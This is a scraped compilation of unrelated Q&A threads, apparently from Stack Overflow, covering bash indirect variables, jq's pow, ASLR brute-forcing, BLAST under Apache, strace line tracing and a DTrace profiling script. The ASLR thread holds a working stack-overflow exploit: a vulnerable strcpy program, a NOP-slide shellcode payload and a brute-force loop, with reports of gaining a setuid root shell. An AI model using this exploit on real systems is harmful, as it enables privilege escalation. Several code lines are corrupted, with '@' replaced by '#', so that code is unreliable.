I'm really struggling with getting some dynamically assigned variables working, even though I've been through the rather wonderfully informative SO article that I've been staring at for a couple of hours now ... I just can't seem to get anything working. I'm using Bash 4.4.20 on Ubuntu 18.04.5.
I have a function that sets up some variables, much like:
declare -g AthreadCount
AthreadCount=$(ps -ef | grep svcA) # 2
declare -g BthreadCount
BthreadCount=$(ps -ef | grep svcB) # 4
declare -g CthreadCount
CthreadCount=$(ps -ef | grep svcC) # 1
In another function, I have the array set up of those services:
declare -a -g services=(A B C)
(to be fair I'm parsing a jq result for the declaration of the array, but it is working and globally available in other functions therefore I'm comfortable it's working as expected)
In another function, I want to evaluate each variables' value and I can't get - what I understand to be called "pointer" assignments - working. I believe my code should look like this:
for sts in "${services[#]}"; do
echo ${sts}
svc="${sts}threadCount"
echo ${!svc}
done
And I would expect:
A
2
B
4
C
1
but I end up getting
A
B
C
Obviously it's not working and I've gone through what I believe to be everything I can do in order to get it working.
Thoughts / comments?!
Related
According to the manual, all the standard math libraries should be available to me for jq. But, not even the simple functions are available.
How do I add the math libraries on Ubuntu or include them when I run jq?
jq -n 'pow(2,4)'
returns
jq: error: pow/1 is not defined at <top-level>, line 1: pow(2,4) jq: 1 compile error
The error message gives it away:
pow/1 is not defined […]
huh, but you are calling it with 2 arguments – why does it try to call the unary function? Nope, you are not. jq uses semicolons to separate call arguments. commas separate the elements in a stream.
jq -n 'pow(2;4)'
This will call pow/2 which you are after.
Then where do commas come into play? Consider:
$ jq -n 'pow(2,3;4,5)'
16 # 2**4 or pow(2;4)
81 # 3**4 or pow(3;4)
32 # 2**5 or pow(2;5)
243 # 3**5 or pow(3;5)
I just read about Address Space Layout Randomization and I tried a very simple script to try to brute force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address many times | 64KB NOP slide | shellcode that runs exit(1)
After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective, did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code using -m32 -z execstack on his 64b computer and after changing the return address a bit, he had the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes which all did what they were supposed to do (even the well know scenario chown root ./vul, chmod +s ./vul, shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...) and finally whoami that returns 'root' in the spawned shell).
That is quite strange since execstack -q ./vul tels me the executable stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
Moreover, I guess you are on a 32bits machine as you did not pass the option -m32 to gcc in order to get 32bits code.
Finally, I did run your program without success (I waited way more than a few seconds).
So, I'm a bit doubtful about your conclusion (except if you are running a very peculiar Linux system or may have been lucky).
Anyway, there are two main things that you have not mentionned:
Having a bug that offer an unlimited exploitation windows is quite rare.
Most of the modern systems run on amd64 (64bits) processors, which lower drastically the probability to hit the nop-zone.
You may take a look at the section "ASLR Effectiveness" on the ASLR's Wikipedia page.
I am running a local blast program in apche2 server...but it showing me error that.
--------------------- WARNING ---------------------
MSG: cannot find path to blastall
My code is..
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Bio::Perl;
use Bio::Tools::Run::StandAloneBlast;
#params = ('database' => 'btaudb','outfile' => 'bla.out',
'_READMETHOD' => 'Blast', 'prog'=> 'blastn');
$factory = Bio::Tools::Run::StandAloneBlast->new(#params);
$str = Bio::SeqIO->new(-file=>'test_query.fa' , '-format' => 'Fasta' );
$input = $str->next_seq();
$factory->blastall($input);
when i am running the same code in terminal its working fine...and showing mw correct result....pl help me..how to run local balst program in apche2 server.....
In my experience, that message means that you do not have the "blastall" tool available in your path. That is, if you typed "blastall -p blastn -d dbname -i input -o output" at your commandline, as was normal usage, your shell would complain about not being able to find blastall.
The Blastall interface appears to be on its way out, as noted here: http://www.ncbi.nlm.nih.gov/books/NBK1763/#CmdLineAppsManual.I43_Backwards_compatib. Newer versions of BLAST have only this wrapper script installed, and expect you to use the BLAST+ interface going forward.
I have found success using Bio::Tools::Run::StandAloneBlastPlus. The interface is very similar, and if your codebase is not very extensive yet, it should be relatively straightforward to begin using.
Is it possible that I can view the line number and file name (for my program running with ltrace/strace) along with the library call/system call information.
Eg:
code section :: ptr = malloc(sizeof(int)*5); (file:code.c, line:21)
ltrace or any other tool: malloc(20) :: code.c::21
I have tried all the options of ltrace/strace but cannot figure out a way to get this info.
If not possible through ltrace/strace, do we have any parallel tool option for GNU/Linux?
You may be able to use the -i option (to output the instruction pointer at the time of the call) in strace and ltrace, combined with addr2line to resolve the calls to lines of code.
No It's not possible. Why don't you use gdb for this purpose?
When you are compiling application with gcc use -ggdb flags to get debugger info into your program and then run your program with gdb or equivalent frontend (ddd or similar)
Here is quick gdb manual to help you out a bit.
http://www.cs.cmu.edu/~gilpin/tutorial/
You can use strace-plus that can collects stack traces associated with each system call.
http://code.google.com/p/strace-plus/
Pretty old question, but I found a way to accomplish what OP wanted:
First use strace with -k option, which will generate a stack trace like this:
openat(AT_FDCWD, NULL, O_RDONLY) = -1 EFAULT (Bad address)
> /usr/lib/libc-2.33.so(__open64+0x5b) [0xefeab]
> /usr/lib/libc-2.33.so(_IO_file_open+0x26) [0x816f6]
> /usr/lib/libc-2.33.so(_IO_file_fopen+0x10a) [0x818ca]
> /usr/lib/libc-2.33.so(__fopen_internal+0x7d) [0x7527d]
> /mnt/r/build/tests/main(main+0x90) [0x1330]
> /usr/lib/libc-2.33.so(__libc_start_main+0xd5) [0x27b25]
> /mnt/r/build/tests/main(_start+0x2e) [0x114e]
The address of each function call are displayed at the end of each line, and you can paste it to addr2line to retrieve the file and line. For example, we want to locate the call in main() (fifth line of the stack trace).
addr2line -e tests/main 0x1330
It will show something like this:
/mnt/r/main.c:55
I was searching online for something to help me do assembly line profiling. I searched and found something on http://www.webservertalk.com/message897404.html
There are two parts of to this problem; finding all instructions of a particular type (inc, add, shl, etc) to determine groupings and then figuring out which are getting executed and summing correcty. The first bit is tricky unless grouping by disassembler is sufficient. For figuring which instructions are being executed, Dtrace is of course your friend here( at least in userland).
The nicest way of doing this would be instrument only the begining of each basic block; finding these would be a manual process right now... however, instrumenting each instruction is feasible for small applications. Here's an example:
First, our quite trivial C program under test:
main()
{
int i;
for (i = 0; i < 100; i++)
getpid();
}
Now, our slightly tricky D script:
#pragma D option quiet
pid$target:a.out::entry
/address[probefunc] == 0/
{
address[probefunc]=uregs[R_PC];
}
pid$target:a.out::
/address[probefunc] != 0/
{
#a[probefunc,(uregs[R_PC]-address[probefunc]), uregs[R_PC]]=count();
}
END
{
printa("%s+%#x:\t%d\t%#d\n", #a);
}
main+0x1: 1
main+0x3: 1
main+0x6: 1
main+0x9: 1
main+0xe: 1
main+0x11: 1
main+0x14: 1
main+0x17: 1
main+0x1a: 1
main+0x1c: 1
main+0x23: 101
main+0x27: 101
main+0x29: 100
main+0x2e: 100
main+0x31: 100
main+0x33: 100
main+0x35: 1
main+0x36: 1
main+0x37: 1
From the example given, this is exactly what i need. However I have no idea what it is doing, how to save the DTrace program, how to execute with the code that i want to get the results of. So i opened this hoping some people with good DTrace background could help me understand the code, save it, run it and hopefully get the results shown.
If all you want to do is run this particular DTrace script, simply save it to a .d script file and use a command like the following to run it against your compiled executable:
sudo dtrace -s dtracescript.d -c [Path to executable]
where you replace dtracescript.d with your script file name.
This assumes that you have DTrace as part of your system (I'm running Mac OS X, which has had it since Leopard).
If you're curious about how this works, I wrote a two-part tutorial on using DTrace for MacResearch a while ago, which can be found here and here.